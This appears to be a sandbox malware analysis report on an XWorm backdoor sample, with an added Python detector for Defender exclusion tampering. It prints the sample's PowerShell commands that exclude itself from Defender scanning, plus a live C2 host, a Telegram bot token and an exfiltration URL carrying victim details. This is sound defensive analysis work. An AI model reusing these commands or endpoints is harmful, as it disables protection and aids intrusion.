                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (85 identical entries)

                      Malware Analysis System Evasion

                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController (4 identical entries)
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe Memory allocated: 990000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe Memory allocated: 1A5F0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (4 identical entries)
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe Window / User API: threadDelayed 2733
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe Window / User API: threadDelayed 7105
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6607
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3240
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5923
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3799
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7074
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2480
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7580
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1938
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe TID: 6516 Thread sleep time: -11068046444225724s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2300 Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 356 Thread sleep count: 5923 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1824 Thread sleep count: 3799 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3704 Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4864 Thread sleep count: 7074 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4864 Thread sleep count: 2480 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6568 Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4232 Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe File Volume queried: C:\ FullSizeInformation (5 identical entries)
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (4 identical entries)
                      Source: NzEsfIiAc0.exe, 00000000.00000002.3430786927.000000001B5DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe Process token adjusted: Debug (2 identical entries)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug (4 identical entries)
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe' (4 identical entries)
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NzEsfIiAc0.exe'
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe' (3 identical entries)
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
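The four process creations above are the sample carving itself and its dropped copy (C:\Users\user\AppData\Roaming\XClient.exe) out of Defender scanning, by path and by process name, with -ExecutionPolicy Bypass so no script policy gets in the way. Add-MpPreference only succeeds from an elevated PowerShell, so this works only where the dropper already runs with administrative rights. The detector below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the sample. It takes process-creation command lines of the shape logged above (Sysmon Event ID 1 or Security 4688 style), decodes any -EncodedCommand payload first so the base64 variant that the report's Sigma hit ("Powershell Base64 Encoded MpPreference Cmdlet") refers to is caught as well, and rates an exclusion as high severity when it points into a user-writable location or names a process by bare file name. The sample command lines, the user-writable directory list and the severity scheme are this example's own constructions and assumptions; three of the sample lines mirror the ones above.

```python
"""Added example: report Defender exclusion tampering from process-creation
command lines (Sysmon Event ID 1 / Security 4688 style).  The sample command
lines at the bottom are constructed for this example; the first three mirror
the shapes seen in the sandbox report, the rest are not from the report."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Cmdlets that change Defender preferences; Set-MpPreference can overwrite an exclusion list outright.
_MP_CMDLET = re.compile(r"\b(?:Add|Set)-MpPreference\b", re.IGNORECASE)
# -ExecutionPolicy may be abbreviated to any unambiguous prefix (-ep, -ex, -exec, ...).
_EP_BYPASS = re.compile(r"-e[px]\w*\s+bypass\b", re.IGNORECASE)
# -EncodedCommand (-e, -ec, -enc, ...) carries a base64-encoded UTF-16LE script.
_ENCODED = re.compile(r"-e(?:c|nc\w*)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# A single-quoted, double-quoted or bare parameter value.
_VALUE = "(?:'[^']*'|\"[^\"]*\"|[^\\s,]+)"
# -Exclusion<Kind> followed by one or more comma-separated values.
_EXCLUSION = re.compile(
    r"-Exclusion(Path|Process|Extension|IpAddress)\s+(" + _VALUE + r"(?:\s*,\s*" + _VALUE + r")*)",
    re.IGNORECASE,
)
# Assumed list of locations a standard user can write to: an exclusion there
# shields a dropper or its payload rather than an administrator-installed product.
_USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\programdata\\", "\\temp\\", "\\public\\")


@dataclass
class Finding:
    command_line: str
    exclusions: List[Tuple[str, str]] = field(default_factory=list)  # (kind, value)
    reasons: List[str] = field(default_factory=list)
    severity: str = "medium"


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the script carried by -EncodedCommand, or None if absent or not valid base64."""
    match = _ENCODED.search(command_line)
    if match is None:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError
        return None


def _values(raw: str) -> List[str]:
    """Split a comma-separated parameter value list and drop the surrounding quotes."""
    return [v.strip("'\"") for v in re.findall(_VALUE, raw)]


def analyze(command_line: str) -> Optional[Finding]:
    """Return a Finding when the command line adds or rewrites Defender exclusions, else None."""
    script = decode_encoded_command(command_line)
    text = command_line if script is None else f"{command_line} {script}"
    if not _MP_CMDLET.search(text):
        return None
    finding = Finding(command_line=command_line, reasons=["adds or rewrites Defender exclusions"])
    if script is not None and _MP_CMDLET.search(script):
        finding.reasons.append("MpPreference cmdlet hidden inside -EncodedCommand")
    if _EP_BYPASS.search(text):
        finding.reasons.append("-ExecutionPolicy Bypass")
    for kind, raw in _EXCLUSION.findall(text):
        for value in _values(raw):
            finding.exclusions.append((kind, value))
            if kind.lower() == "path" and any(d in value.lower() for d in _USER_WRITABLE):
                finding.reasons.append(f"excluded path is user-writable: {value}")
                finding.severity = "high"
            elif kind.lower() == "process" and "\\" not in value:
                # A bare file name excludes every process with that name, wherever it runs from.
                finding.reasons.append(f"process excluded by bare name: {value}")
                finding.severity = "high"
    return finding


def scan(command_lines: List[str]) -> List[Finding]:
    """Run analyze() over a batch of command lines and keep the hits."""
    return [f for f in map(analyze, command_lines) if f is not None]


_PS = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'
# Constructed: the XClient.exe exclusion again, as the base64 UTF-16LE form -EncodedCommand expects.
_ENC_PAYLOAD = base64.b64encode(
    r"Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'".encode("utf-16-le")
).decode("ascii")

# Constructed sample events (not taken from any real log).
SAMPLE_COMMAND_LINES = [
    _PS + r" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\NzEsfIiAc0.exe'",
    _PS + r" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'",
    _PS + r" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'",
    _PS + " -ep bypass -enc " + _ENC_PAYLOAD,  # same change, hidden in -EncodedCommand
    _PS + r''' -Command "Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft SQL Server'"''',  # admin change: medium
    _PS + r" -ExecutionPolicy Bypass -File C:\Deploy\deploy.ps1",  # no Defender change: not reported
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_COMMAND_LINES):
        print(hit.severity.upper(), hit.exclusions, "; ".join(hit.reasons))
```

On the endpoint itself the same change leaves two further traces worth checking during triage: Windows Defender writes event 5007 ("configuration changed") to the Microsoft-Windows-Windows Defender/Operational log with the new value, and the exclusion appears under HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths or \Processes; Get-MpPreference lists the live ExclusionPath and ExclusionProcess values, and Remove-MpPreference takes them back out. Matching only on -ExecutionPolicy Bypass would be far too noisy, which is why the example keys on the MpPreference cmdlet and uses the policy bypass only as a corroborating reason.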
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe Queries volume information: C:\Users\user\Desktop\NzEsfIiAc0.exe VolumeInformation
                      Source: C:\Users\user\Desktop\NzEsfIiAc0.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (17 identical entries)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (4 identical entries)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 identical entries)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation (3 identical entries)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 identical entries)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 identical entries)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation (3 identical entries)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (9 identical entries)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation (3 identical entries)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation (3 identical entries)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation (2 identical entries)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: NzEsfIiAc0.exe, 00000000.00000002.3393667557.0000000000815000.00000004.00000020.00020000.00000000.sdmp, NzEsfIiAc0.exe, 00000000.00000002.3430786927.000000001B5DD000.00000004.00000020.00020000.00000000.sdmp, NzEsfIiAc0.exe, 00000000.00000002.3430786927.000000001B68A000.00000004.00000020.00020000.00000000.sdmp, NzEsfIiAc0.exe, 00000000.00000002.3430786927.000000001B64A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\NzEsfIiAc0.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: NzEsfIiAc0.exe PID: 3576, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: NzEsfIiAc0.exe, type: SAMPLE
Source: Yara match | File source: 0.0.NzEsfIiAc0.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2148971109.0000000000262000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: NzEsfIiAc0.exe PID: 3576, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: NzEsfIiAc0.exe, type: SAMPLE
Source: Yara match | File source: 0.0.NzEsfIiAc0.exe.260000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2148971109.0000000000262000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
MITRE ATT&CK Matrix (matched techniques per tactic; the number of matching signatures is given in parentheses)

Execution: Windows Management Instrumentation (11); PowerShell (1)
Persistence: Registry Run Keys / Startup Folder (2); DLL Side-Loading (1)
Privilege Escalation: Process Injection (11); Registry Run Keys / Startup Folder (2); DLL Side-Loading (1)
Defense Evasion: Masquerading (1); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (131); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (11); Software Packing (2); DLL Side-Loading (1)
Credential Access: Input Capture (1)
Discovery: Security Software Discovery (221); Process Discovery (1); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (13)
Collection: Input Capture (1); Archive Collected Data (11)
Command and Control: Web Service (1); Encrypted Channel (11); Non-Standard Port (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (13)
Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration, Impact: no matched techniques
Behavior Graph (ID: 1512625; sample: NzEsfIiAc0.exe; start date: 17/09/2024; architecture: WINDOWS; score: 100)

Signatures on the sample: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures

Network:
• api.telegram.org (149.154.167.220, 443, 49719; TELEGRAMRU, United Kingdom): Uses the Telegram API (likely for C&C communication)
• paul-vocational.gl.at.ply.gg (147.185.221.21, 49721, 49724, 49725; SALSGIVERUS, United States)

Process tree:
• NzEsfIiAc0.exe (started)
  Dropped file: C:\Users\user\AppData\Roaming\XClient.exe, PE32
  Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Protects its processes via BreakOnTermination flag; Bypasses PowerShell execution policy; Adds a directory exclusion to Windows Defender
  • powershell.exe (4 instances started, each with a conhost.exe child); signature: Loading BitLocker PowerShell Module

Antivirus, Machine Learning and Genetic Malware Detection (Source | Detection | Scanner | Label)

Initial sample:
NzEsfIiAc0.exe | 82% | ReversingLabs | ByteCode-MSIL.Backdoor.XWorm
NzEsfIiAc0.exe | 100% | Avira | TR/Spy.Gen
NzEsfIiAc0.exe | 100% | Joe Sandbox ML

Dropped files:
C:\Users\user\AppData\Roaming\XClient.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Roaming\XClient.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Roaming\XClient.exe | 82% | ReversingLabs | ByteCode-MSIL.Backdoor.XWorm

Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches
URLs (Source | Detection | Scanner | Label):
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://api.telegram.org | 0% | Avira URL Cloud | safe
paul-vocational.gl.at.ply.gg | 0% | Avira URL Cloud | safe
http://crl.m | 0% | Avira URL Cloud | safe
http://crl.micft.cMicRosof | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage?chat_id=6378619811&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF248E435BF45453C730E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20AFXDXR%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 | 0% | Avira URL Cloud | safe
http://crl.mic | 0% | Avira URL Cloud | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot | 0% | Avira URL Cloud | safe
http://www.microsoft.co | 0% | Avira URL Cloud | safe
https://nt.C | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage?chat_id=63786 | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation):
api.telegram.org | 149.154.167.220 | true | true | (none) | unknown
paul-vocational.gl.at.ply.gg | 147.185.221.21 | true | true | (none) | unknown

Contacted URLs (Name | Malicious | Antivirus Detection | Reputation):
paul-vocational.gl.at.ply.gg | true | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot7257052308:AAHtKjZX7lN02oui8O_i3QInFkhLYhMmdNA/sendMessage?chat_id=6378619811&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AF248E435BF45453C730E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20AFXDXR%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 | true | Avira URL Cloud: safe | unknown
URLs from memory and binaries (Name | Source | Malicious | Antivirus Detection | Reputation):
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2235529090.000001535232F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2330121656.000001921C08F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2470760532.000001A61006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2661161748.000002DDB16FE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.m | powershell.exe, 00000002.00000002.2242258397.000001535A9AE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.telegram.org | NzEsfIiAc0.exe, 00000000.00000002.3398807333.00000000025F1000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000D.00000002.2539816405.000002DDA18B9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot | NzEsfIiAc0.exe, XClient.exe.0.dr | true | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.2219535625.00000153424E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2269705206.000001920C24A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2380787524.000001A600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2539816405.000002DDA18B9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000D.00000002.2539816405.000002DDA18B9000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.2219535625.00000153424E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2269705206.000001920C24A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2380787524.000001A600229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2539816405.000002DDA18B9000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
